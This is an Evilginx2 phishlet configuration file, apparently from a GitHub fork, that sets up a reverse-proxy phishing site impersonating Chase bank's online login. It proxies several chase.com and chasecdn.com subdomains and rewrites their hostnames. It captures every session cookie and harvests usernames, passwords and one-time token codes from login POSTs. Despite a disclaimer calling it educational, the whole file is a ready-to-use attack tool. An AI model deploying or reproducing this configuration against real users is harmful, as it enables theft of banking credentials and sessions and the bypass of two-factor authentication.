forked from An0nUD4Y/Evilginx2-Phishlets
-
Notifications
You must be signed in to change notification settings - Fork 0
/
chase.yaml
90 lines (80 loc) · 10.1 KB
/
chase.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
# PLEASE DO NOT MISUSE THIS PHISHLET.
author: '@An0nud4y'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'secure05b', orig_sub: 'secure05b', domain: 'chase.com', session: true, is_landing: true}
- {phish_sub: 'secure07c', orig_sub: 'secure07c', domain: 'chase.com', session: true, is_landing: true}
- {phish_sub: 'secure', orig_sub: 'secure', domain: 'chase.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'chase.com', session: true, is_landing: true}
- {phish_sub: '', orig_sub: '', domain: 'chase.com', session: true, is_landing: false}
# - {phish_sub: 'midas', orig_sub: 'midas', domain: 'chase.com', session: true, is_landing: false}
# - {phish_sub: 'analytics', orig_sub: 'analytics', domain: 'chase.com', session: true, is_landing: false}
- {phish_sub: 'sites', orig_sub: 'sites', domain: 'chase.com', session: true, is_landing: false}
- {phish_sub: 'static', orig_sub: 'static', domain: 'chasecdn.com', session: true, is_landing: false}
sub_filters:
- {triggers_on: 'secure05b.chase.com', orig_sub: '', domain: 'chase.com', search: 'https://secure.{domain}/', replace: 'https://secure07c.{domain}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: '', domain: 'chase.com', search: 'secure.{domain}', replace: 'secure07c.{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: 'www', domain: 'chase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: 'www', domain: 'chase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: '', domain: 'chase.com', search: 'https://{domain}/', replace: 'https://{domain}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: '', domain: 'chase.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: 'secure05b', domain: 'chase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: 'secure05b', domain: 'chase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
# - {triggers_on: 'secure05b.chase.com', orig_sub: 'midas', domain: 'chase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
# - {triggers_on: 'secure05b.chase.com', orig_sub: 'midas', domain: 'chase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: 'sites', domain: 'chase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: 'sites', domain: 'chase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: 'static', domain: 'chasecdn.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'secure05b.chase.com', orig_sub: 'static', domain: 'chasecdn.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
# - {triggers_on: 'secure05b.chase.com', orig_sub: 'analytics', domain: 'chasecdn.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
# - {triggers_on: 'secure05b.chase.com', orig_sub: 'analytics', domain: 'chasecdn.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: 'www', domain: 'chase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: 'www', domain: 'chase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: '', domain: 'chase.com', search: 'https://{domain}/', replace: 'https://{domain}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: '', domain: 'chase.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: 'secure05b', domain: 'chase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: 'secure05b', domain: 'chase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: '', domain: 'chase.com', search: 'https://secure.{domain}/', replace: 'https://secure07c.{domain}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: '', domain: 'chase.com', search: 'secure.{domain}', replace: 'secure07c.{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
# - {triggers_on: 'www.chase.com', orig_sub: 'midas', domain: 'chase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
# - {triggers_on: 'www.chase.com', orig_sub: 'midas', domain: 'chase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: 'sites', domain: 'chase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: 'sites', domain: 'chase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: 'static', domain: 'chasecdn.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.chase.com', orig_sub: 'static', domain: 'chasecdn.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
# - {triggers_on: 'www.chase.com', orig_sub: 'analytics', domain: 'chasecdn.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
# - {triggers_on: 'www.chase.com', orig_sub: 'analytics', domain: 'chasecdn.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
auth_tokens:
- domain: '.chase.com'
keys: ['.*,regexp']
- domain: 'secure05b.chase.com'
keys: ['.*,regexp']
- domain: 'sites.chase.com'
keys: ['.*,regexp']
auth_urls:
- '/overviewAccounts/*'
credentials:
username:
key: 'auth_userId'
search: '(.*)'
type: 'post'
password:
key: '^auth_passwd$'
search: '(.*)'
type: 'post'
custom:
- key: 'auth_tokencode'
search: '(.*)'
type: 'post'
#force_post:
# - path: '/auth/fcc/login'
# search:
# - {key: 'auth_userId', search: '.*'}
# - {key: 'auth_passwd', search: '.*'}
# force:
# - {key: 'stay_signed_in', value: '1'}
# type: 'post'
login:
domain: 'secure05b.chase.com'
path: '/web/auth/#/logon/logon/chaseOnline'